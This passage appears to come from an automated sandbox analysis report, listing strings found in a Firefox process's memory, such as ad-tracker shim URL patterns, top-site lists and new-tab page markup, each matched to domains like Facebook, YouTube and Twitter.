"*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F944710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3692471898.000001F94B540000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3692471898.000001F94B540000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000003.3413210956.000001F94B540000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: current application version: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-pintaskbar.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-import.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-import.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)https://www.mozilla.org/firefox/mobile/get-app/?utm_medium=firefox-desktop&utm_source=onboarding-modal&utm_campaign=mr2022&utm_content=new-globalThank you for using Firefox, backed by the Mozilla Foundation. With your support, we're working to make the internet safer and more accessible for everyone. You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/url('chrome://activity-stream/content/data/content/assets/mr-mobilecrosspromo.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-gratitude.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color) equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: current application version: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-pintaskbar.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-import.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-import.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)https://www.mozilla.org/firefox/mobile/get-app/?utm_medium=firefox-desktop&utm_source=onboarding-modal&utm_campaign=mr2022&utm_content=new-globalThank you for using Firefox, backed by the Mozilla Foundation. With your support, we're working to make the internet safer and more accessible for everyone. You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/url('chrome://activity-stream/content/data/content/assets/mr-mobilecrosspromo.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-gratitude.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color) equals www.twitter.com (Twitter)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: current application version: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-pintaskbar.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-import.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-import.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)https://www.mozilla.org/firefox/mobile/get-app/?utm_medium=firefox-desktop&utm_source=onboarding-modal&utm_campaign=mr2022&utm_content=new-globalThank you for using Firefox, backed by the Mozilla Foundation. With your support, we're working to make the internet safer and more accessible for everyone. You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/url('chrome://activity-stream/content/data/content/assets/mr-mobilecrosspromo.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-gratitude.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color)url('chrome://activity-stream/content/data/content/assets/mr-settodefault.svg') var(--mr-secondary-position) no-repeat var(--mr-screen-background-color) equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: devtools/client/framework/devtools-browserNo callback set for this channel.^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)devtools.performance.popup.feature-flag^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?releaseDistinctSystemPrincipalLoaderFailed to listen. Callback argument missing.devtools.debugger.remote-websocketbrowser.fixup.dns_first_for_single_wordsbrowser.fixup.domainsuffixwhitelist.get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPget FIXUP_FLAGS_MAKE_ALTERNATE_URI@mozilla.org/uriloader/handler-service;1devtools/client/framework/devtools@mozilla.org/network/protocol;1?name=defaultDevTools telemetry entry point failed: {9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}Got invalid request to save JSON dataresource://devtools/server/devtools-server.jsUnable to start devtools server on JSON Viewer's onSave failed in startPersistenceDevToolsStartup.jsm:handleDebuggerFlagFailed to listen. Listener already attached.WebChannel/this._originCheckCallbackbrowser.urlbar.dnsResolveFullyQualifiedNames^([a-z+.-]+:\/{0,3})*([^\/@]+@).+resource://devtools/shared/security/socket.js@mozilla.org/dom/slow-script-debug;1Failed to execute WebChannel callback:@mozilla.org/network/protocol;1?name=filedevtools.performance.recording.ui-base-url^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$https://mail.inbox.lv/compose?to=%shttp://poczta.interia.pl/mh/?mailto=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%sextractScheme/fixupChangedProtocol<@mozilla.org/uriloader/web-handler-app;1@mozilla.org/uriloader/dbus-handler-app;1@mozilla.org/network/file-input-stream;1resource://gre/modules/DeferredTask.sys.mjsisDownloadsImprovementsAlreadyMigratedhandlerSvc fillHandlerInfo: don't know this typeresource://gre/modules/ExtHandlerService.sys.mjs_finalizeInternal/this._finalizePromise<resource://gre/modules/FileUtils.sys.mjs@mozilla.org/uriloader/local-handler-app;1Can't invoke URIFixup in the content processScheme should be either http or https_injectDefaultProtocolHandlersIfNeededhttp://compose.mail.yahoo.co.jp/ym/Compose?To=%sgecko.handlerService.defaultHandlersVersionhttps://mail.yahoo.co.jp/compose/?To=%shttps://poczta.interia.pl/mh/?mailto=%sresource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/JSONFile.sys.mjsresource://gre/modules/NetUtil.sys.mjsresource://gre/modules/JSONFile.sys.mjsresource://gre/modules/URIFixup.sys.mjs{33d75835-722f-42c0-89cc-44f328e56a86}get FIXUP_FLAG_FORCE_ALTERNATE_URI{c6cf88b7-452e-47eb-bdc9-86e3561648ef}resource://gre/modules/FileUtils.sys.mjshttp://www.inbox.lv/rfc2368/?value=%sMust have a source and a callback@mozilla.org/network/input-stream-pump;1newChannel requires a single object argumentSEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLNon-zero amount of bytes must be specified@mozilla.org/intl/converter-input-stream;1@mozilla.org/scriptableinputstream;1https://e.mail.ru/cgi-bin/sentmsg?mailto=%s@mozilla.org/network/simple-stream-listener;1First argument should be an nsIInputStreamhttps://mail.inbox.lv/compose?to=%spdfjs.previous
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F9409BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: doff-text" data-l10n-args="{&quot;user&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
                          Source: firefox.exe, 0000002F.00000002.3450427284.000001F9409BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: doff-text" data-l10n-args="{&quot;user&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: findUpdates() - updateTask succeeded for media.gmp-manager.cert.requireBuiltInfindUpdates() - found update for KEY_PLUGIN_LAST_DOWNLOAD_FAIL_REASONonPrefEnabledChanged() - adding gmp directory startup - adding clearkey CDM failedThis should only be called from XPCShell testsKEY_PLUGIN_LAST_INSTALL_FAIL_REASONipc:first-content-process-createdresource://gre/modules/amManager.sys.mjsonPrefEnabledChanged() - removing gmp directory onPrefEMEGlobalEnabledChanged() id=media.gmp-manager.cert.checkAttributes*://*.imgur.com/js/vendor.*.bundle.jsFileUtils_closeAtomicFileOutputStream*://c.amazon-adsystem.com/aax2/apstag.js*://static.chartbeat.com/js/chartbeat.js*://connect.facebook.net/*/sdk.js*FileUtils_openSafeFileOutputStream@mozilla.org/network/safe-file-output-stream;1*://www.everestjs.net/static/st.v3.js**://static.criteo.net/js/ld/publishertag.js*://*.imgur.io/js/vendor.*.bundle.jsresource://gre/modules/FileUtils.sys.mjsresource://gre/modules/ConduitsParent.sys.mjs equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/?field-keywords=&ie=UTF-8&mode=blended&tag=mozilla-20&sourceid=Mozilla-searchhttps://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B0D0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3531852859.000001F94471B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3466728259.000001F943826000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3664339405.000001F94B0D0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3780240336.000028A47F500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3466728259.000001F943826000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3445678517.000001F93EFE0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 0000002F.00000002.3569934382.000001F944C8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.3445678517.000001F93EF72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
